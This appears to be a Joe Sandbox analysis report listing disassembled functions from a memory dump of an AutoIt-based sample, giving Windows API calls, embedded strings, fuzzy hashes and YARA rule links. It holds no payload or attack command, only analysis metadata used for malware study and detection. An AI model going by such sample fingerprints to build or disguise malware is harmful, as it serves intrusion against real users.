Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 86f1b38cc06ea92da32c7b9a4e8def24432786065a875d913129d08aebe1f9b0
Instruction ID: 3702b25576c893ed4640c08675a14a912a2300cda9aad74893a53dbedb578b47
Opcode Fuzzy Hash: 86f1b38cc06ea92da32c7b9a4e8def24432786065a875d913129d08aebe1f9b0
Instruction Fuzzy Hash: F8D05E3326050EABEF018EA4DC01EAE3B79EB04B01F408111FE15D50A0C775D835AB60

Function 00A30722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00A30734

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: dc1f6ae8d0e2391238bdc6e107c26ae16226cb109474176b9ebc2b7d4de812f2
Instruction ID: 4d732a3704fb77dbf0c8f9680d846d2bcc5865687c00272a001754a6330bdbd3
Opcode Fuzzy Hash: dc1f6ae8d0e2391238bdc6e107c26ae16226cb109474176b9ebc2b7d4de812f2
Instruction Fuzzy Hash: E1C04CF1800109DBCB05DBA0D998EEF7BBCAB04305F100055A105B2110D7749B448B71

Function 00A1A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A1A35A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 33f399fce0472e4c3f5e9ece50c5bd961528dc787efd9d22aeba22317890648b
Instruction ID: 06a267ae84b7f4ff88dbc63f98ebd026096bf49572f0960eab8c11d4fdebe506
Opcode Fuzzy Hash: 33f399fce0472e4c3f5e9ece50c5bd961528dc787efd9d22aeba22317890648b
Instruction Fuzzy Hash: 3FA0223002020CFBCF002FC2FC08C88BFACEB022A0B008020F80C08032CB33A8228BC0

Function 00A67EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A67F45
DeleteObject.GDI32(00000000), ref: 00A67F57
DestroyWindow.USER32 ref: 00A67F65
GetDesktopWindow.USER32 ref: 00A67F7F
GetWindowRect.USER32(00000000), ref: 00A67F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00A680C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00A680D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6811F
GetClientRect.USER32(00000000,?), ref: 00A6812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A68165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A68187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A6819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A681A5
GlobalLock.KERNEL32(00000000), ref: 00A681AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A681BD
GlobalUnlock.KERNEL32(00000000), ref: 00A681C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A681CD
GlobalFree.KERNEL32(00000000), ref: 00A681D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A681EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A83C7C,00000000), ref: 00A68200
GlobalFree.KERNEL32(00000000), ref: 00A68210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00A68236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00A68255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A68277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A68464

Strings

static, xrefs: 00A6815F, 00A682B6
AutoIt v3, xrefs: 00A68117
DISPLAY, xrefs: 00A682C7
, xrefs: 00A683EA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: aa3ea1780efffa28a3d784cb7a09d42a8cc2d4c236dbf6857ef1b28285bde5a0
Instruction ID: 33140dcbfac59a76572519b97b5b4822d6059c9f6cd6b3586edd0a6a13288bc0
Opcode Fuzzy Hash: aa3ea1780efffa28a3d784cb7a09d42a8cc2d4c236dbf6857ef1b28285bde5a0
Instruction Fuzzy Hash: 9A027171900119EFDB14DFA4CC89EAE7BB9FF48310F048658F915AB2A1DB749D46CB60

Function 00A73BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00A80980), ref: 00A73C65
IsWindowVisible.USER32(?), ref: 00A73C89

Strings

ISCHECKED, xrefs: 00A73E77
EDITPASTE, xrefs: 00A73F9D
GETSELECTED, xrefs: 00A73EE1
SENDCOMMANDID, xrefs: 00A74018
TABRIGHT, xrefs: 00A73CDB
CHECK, xrefs: 00A73EAB
ISENABLED, xrefs: 00A73CA9
HIDEDROPDOWN, xrefs: 00A73D3E
FINDSTRING, xrefs: 00A73DB4
DELSTRING, xrefs: 00A73D87
GETCURRENTCOL, xrefs: 00A73F66
SELECTSTRING, xrefs: 00A73E44
ADDSTRING, xrefs: 00A73D54
CURRENTTAB, xrefs: 00A73CFB
GETLINE, xrefs: 00A73FD9
TABLEFT, xrefs: 00A73CC5
SHOWDROPDOWN, xrefs: 00A73D1E
GETLINECOUNT, xrefs: 00A73F04
GETCURRENTSELECTION, xrefs: 00A73E21
UNCHECK, xrefs: 00A73EC1
GETCURRENTLINE, xrefs: 00A73F2B
ISVISIBLE, xrefs: 00A73C75
SETCURRENTSELECTION, xrefs: 00A73DF4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 4ed4d5bdb3607a196228e8fb9ff0d9f1c3d9914d724c6ceec0ce069b4cc5db0a
Instruction ID: 7016c4149c0ab9f23700ac12d10942431d5f818b056be0f5d23fe0c7d5a77341
Opcode Fuzzy Hash: 4ed4d5bdb3607a196228e8fb9ff0d9f1c3d9914d724c6ceec0ce069b4cc5db0a
Instruction Fuzzy Hash: B9D18031204205CFCB14EF10C951EAEB7B5AF99354F11C868F94A5B2E2CB75EE4ADB42

Function 00A7ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A7AC55
GetSysColorBrush.USER32(0000000F), ref: 00A7AC86
GetSysColor.USER32(0000000F), ref: 00A7AC92
SetBkColor.GDI32(?,000000FF), ref: 00A7ACAC
SelectObject.GDI32(?,?), ref: 00A7ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00A7ACE6
GetSysColor.USER32(00000010), ref: 00A7ACEE
CreateSolidBrush.GDI32(00000000), ref: 00A7ACF5
FrameRect.USER32(?,?,00000000), ref: 00A7AD04
DeleteObject.GDI32(00000000), ref: 00A7AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00A7AD56
FillRect.USER32(?,?,?), ref: 00A7AD88
GetWindowLongW.USER32(?,000000F0), ref: 00A7ADB3

Part of subcall function 00A7AF18: GetSysColor.USER32(00000012), ref: 00A7AF51
Part of subcall function 00A7AF18: SetTextColor.GDI32(?,?), ref: 00A7AF55
Part of subcall function 00A7AF18: GetSysColorBrush.USER32(0000000F), ref: 00A7AF6B
Part of subcall function 00A7AF18: GetSysColor.USER32(0000000F), ref: 00A7AF76
Part of subcall function 00A7AF18: GetSysColor.USER32(00000011), ref: 00A7AF93
Part of subcall function 00A7AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A7AFA1
Part of subcall function 00A7AF18: SelectObject.GDI32(?,00000000), ref: 00A7AFB2
Part of subcall function 00A7AF18: SetBkColor.GDI32(?,00000000), ref: 00A7AFBB
Part of subcall function 00A7AF18: SelectObject.GDI32(?,?), ref: 00A7AFC8
Part of subcall function 00A7AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00A7AFE7
Part of subcall function 00A7AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A7AFFE
Part of subcall function 00A7AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00A7B013

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 396efe77f6be27c10c7553e7f59b00668ec7f339fe0416d471fc21f33655b67a
Instruction ID: 5cc7367a318efa5a3deeea1fde0250ecc1ab6c2a7ada9e482169418e2660b635
Opcode Fuzzy Hash: 396efe77f6be27c10c7553e7f59b00668ec7f339fe0416d471fc21f33655b67a
Instruction Fuzzy Hash: 35A17972008301BFD795DFA4DC08E6F7BA9FF88321F108A19F966961A1D770D849CB52

Function 009F2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 009F3072
DeleteObject.GDI32(00000000), ref: 009F30B8
DeleteObject.GDI32(00000000), ref: 009F30C3
DestroyIcon.USER32(00000000,?,?,?), ref: 009F30CE
DestroyWindow.USER32(00000000,?,?,?), ref: 009F30D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00A2C77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A2C7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A2CBDE

Part of subcall function 009F1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009F2412,?,00000000,?,?,?,?,009F1AA7,00000000,?), ref: 009F1F76

SendMessageW.USER32(?,00001053), ref: 00A2CC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A2CC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A2CC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A2CC53

Strings

0, xrefs: 00A2CA72

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b138c9e5e0e7eab32a9271dd1569f36028b1b37599f2941dd317905b3130d76c
Instruction ID: 72c836dacbd18f5949b59b5f78c4f49a686b60dd9abc4cc8b6e6a817cee44b94
Opcode Fuzzy Hash: b138c9e5e0e7eab32a9271dd1569f36028b1b37599f2941dd317905b3130d76c
Instruction Fuzzy Hash: 34129F30600215EFCB24CF28D884BA9BBE5BF48320F18857AF555CB262CB35ED56CB91

Function 00A027FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00A10FE6: std::exception::exception.LIBCMT ref: 00A1101C
Part of subcall function 00A10FE6: __CxxThrowException@8.LIBCMT ref: 00A11031

__wcsnicmp.LIBCMT ref: 00A0286A
__wcsnicmp.LIBCMT ref: 00A0287E
__wcsnicmp.LIBCMT ref: 00A02896
__wcsnicmp.LIBCMT ref: 00A028AE
__wcsnicmp.LIBCMT ref: 00A028C6
__wcsnicmp.LIBCMT ref: 00A028DE
__wcsnicmp.LIBCMT ref: 00A028F6
__wcsnicmp.LIBCMT ref: 00A0290A
__wcsnicmp.LIBCMT ref: 00A02948
__wcsnicmp.LIBCMT ref: 00A0295C
__wcsnicmp.LIBCMT ref: 00A02970
__wcsnicmp.LIBCMT ref: 00A02984

Strings

#comments-start, xrefs: 00A028F0, 00A02942
Cannot parse #include, xrefs: 00A3FCE5
#requireadmin, xrefs: 00A02890
#notrayicon, xrefs: 00A02878
", xrefs: 00A3FB89
#ce, xrefs: 00A0297E
#cs, xrefs: 00A02904, 00A02956
Unterminated group of comments, xrefs: 00A3FCFA
#OnAutoItStartRegister, xrefs: 00A028A8
Bad directive syntax error, xrefs: 00A3FBD3, 00A3FBF0
#include-once, xrefs: 00A028C0
#include, xrefs: 00A028D8
#pragma compile, xrefs: 00A02864
', xrefs: 00A3FB9F
#comments-end, xrefs: 00A0296A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: bac9f3b68febcfc9b1f1a091e8541d40cf656feaf832051ba7e73c6aaa332856
Instruction ID: b8eed5644c872996d596b5277f872458017563d0ae81153d40271ee4f82ebce2
Opcode Fuzzy Hash: bac9f3b68febcfc9b1f1a091e8541d40cf656feaf832051ba7e73c6aaa332856
Instruction Fuzzy Hash: 35A18971A40309BBCB24AF60EE56FBE7BB8BF45740F104029F805AA2D2EB719E55D750

Function 00A67B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00A67BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A67C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00A67CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A67CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A67D1D
GetClientRect.USER32(00000000,?), ref: 00A67D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00A67D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A67D7C
GetStockObject.GDI32(00000011), ref: 00A67D8C
SelectObject.GDI32(00000000,00000000), ref: 00A67D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A67DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A67DA9
DeleteDC.GDI32(00000000), ref: 00A67DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A67DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00A67DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00A67E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A67E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00A67E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00A67E85
GetStockObject.GDI32(00000011), ref: 00A67E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A67E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A67EA5

Strings

static, xrefs: 00A67D67, 00A67E7F
AutoIt v3, xrefs: 00A67D15
msctls_progress32, xrefs: 00A67E26
DISPLAY, xrefs: 00A67D72

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 819ea243fd540a65cad9bbbf86ec009a3d8282b4e6797c4b1c3d46e3ffbd967c
Instruction ID: bccd766d08e87426d0baa2c5c502c95bc31b148874430ed286494df8e0e881e7
Opcode Fuzzy Hash: 819ea243fd540a65cad9bbbf86ec009a3d8282b4e6797c4b1c3d46e3ffbd967c
Instruction Fuzzy Hash: 5FA16DB1A40619BFEB14DBA4DC4AFAE7BB9EF44710F044214FA15A72E1D7B0AD05CB60

Function 00A5B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A5B361
GetDriveTypeW.KERNEL32(?,00A82C4C,?,\\.\,00A80980), ref: 00A5B43E
SetErrorMode.KERNEL32(00000000,00A82C4C,?,\\.\,00A80980), ref: 00A5B59C

Strings

SAS, xrefs: 00A5B548
FileBackedVirtual, xrefs: 00A5B56B
Virtual, xrefs: 00A5B564
CDROM, xrefs: 00A5B472
RAID, xrefs: 00A5B53A
Unknown, xrefs: 00A5B45E, 00A5B502
PhysicalDrive, xrefs: 00A5B3EA
RAMDisk, xrefs: 00A5B468
1394, xrefs: 00A5B51E
Fibre, xrefs: 00A5B52C
MMC, xrefs: 00A5B55D
ATAPI, xrefs: 00A5B510
SCSI, xrefs: 00A5B509
SSD, xrefs: 00A5B4C9
ATA, xrefs: 00A5B517
SATA, xrefs: 00A5B54F
\\.\, xrefs: 00A5B3B3
USB, xrefs: 00A5B533
Network, xrefs: 00A5B47C
Fixed, xrefs: 00A5B486
iSCSI, xrefs: 00A5B541
SSA, xrefs: 00A5B525
Removable, xrefs: 00A5B490

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: fe5ad5ee903b856ddf3897e7dd16b787c735daa93b563cb0ea475f75a71e034b
Instruction ID: 9f6ebf3c37175b68a44d5a6b7f8d7edddbcc1a9e69edb3252ddf0553f2cb5e35
Opcode Fuzzy Hash: fe5ad5ee903b856ddf3897e7dd16b787c735daa93b563cb0ea475f75a71e034b
Instruction Fuzzy Hash: 38516330B60209FBC714DB60CA42ABD77B1BB85783B244415F807A72D2E771AE89DB71

Function 00A7A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00A7A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A7A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00A7A1CC

Strings

0, xrefs: 00A7A209

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 15e62cea427b32420a199c625518965404aa93bb936dae6808a3c8c2224a6797
Instruction ID: a81dd36d5b1b40ae85351ba23338a7589c1c75e12c72c4b0c7df84b96534aef3
Opcode Fuzzy Hash: 15e62cea427b32420a199c625518965404aa93bb936dae6808a3c8c2224a6797
Instruction Fuzzy Hash: 0102CA30208201BFEB25CF14CC58BAEBBE4FFA5314F04C629F99D962A1D7759855CB92

Function 00A7AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A7AF51
SetTextColor.GDI32(?,?), ref: 00A7AF55
GetSysColorBrush.USER32(0000000F), ref: 00A7AF6B
GetSysColor.USER32(0000000F), ref: 00A7AF76
CreateSolidBrush.GDI32(?), ref: 00A7AF7B
GetSysColor.USER32(00000011), ref: 00A7AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A7AFA1
SelectObject.GDI32(?,00000000), ref: 00A7AFB2
SetBkColor.GDI32(?,00000000), ref: 00A7AFBB
SelectObject.GDI32(?,?), ref: 00A7AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00A7AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A7AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00A7B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A7B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A7B086
InflateRect.USER32(?,000000FD,000000FD), ref: 00A7B0A4
DrawFocusRect.USER32(?,?), ref: 00A7B0AF
GetSysColor.USER32(00000011), ref: 00A7B0BD
SetTextColor.GDI32(?,00000000), ref: 00A7B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A7B0D9
SelectObject.GDI32(?,00A7AC1F), ref: 00A7B0F0
DeleteObject.GDI32(?), ref: 00A7B0FB
SelectObject.GDI32(?,?), ref: 00A7B101
DeleteObject.GDI32(?), ref: 00A7B106
SetTextColor.GDI32(?,?), ref: 00A7B10C
SetBkColor.GDI32(?,?), ref: 00A7B116

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
